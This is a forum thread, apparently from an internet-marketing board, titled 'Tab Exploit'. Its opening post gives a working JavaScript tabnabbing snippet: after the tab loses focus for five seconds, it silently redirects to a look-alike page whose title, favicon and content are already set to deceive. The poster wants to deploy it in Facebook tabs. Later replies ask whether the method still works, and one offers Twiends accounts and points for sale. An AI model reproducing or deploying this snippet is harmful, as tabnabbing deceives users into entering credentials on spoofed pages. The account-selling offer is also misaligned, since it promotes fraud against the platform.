Tab Exploit

imo this can't be 'fixed' because it's using very general js functions to accomplish the task. here's an alternate version that does pretty much the same thing:

Code:
<script>
window.onblur = function(){
  TIMER = setTimeout(changeItUp, 5000);
}  

window.onfocus = function(){
  if(TIMER) clearTimeout(TIMER);
}

function changeItUp()
{
  location.href = "http://www.yahoo.com"
}
</script>
basically it just says that if the window focus is removed, wait 5 seconds and then redirect to another domain, for which the title, favicon, and content have already been set to what they need to be.

I just wonder if it's possible to translate this code to a valid FBJS?
'Cause this would be pretty epic in a FBML tab...
 
Almost a month and no updates, is this method still working? is it worth me getting my coder to look into it?
 
what is this for? Sorry, i just dont understand how to use it and what it does...someone cares to explain further....thanks.. :)
 
want to sale my twiends account some accounts have 25,000 points and some of have 50,000 points in them. if some one wants to buy these account so please tell me.

i am asking
$ 35 for 25,000 points account
$ 80 for 50,000 points account

if someone interested so please let me know.
and tell how how will you pay me
 
Thanks for the great tip! wish I would have been on this when you originally posted.
 
Back
Top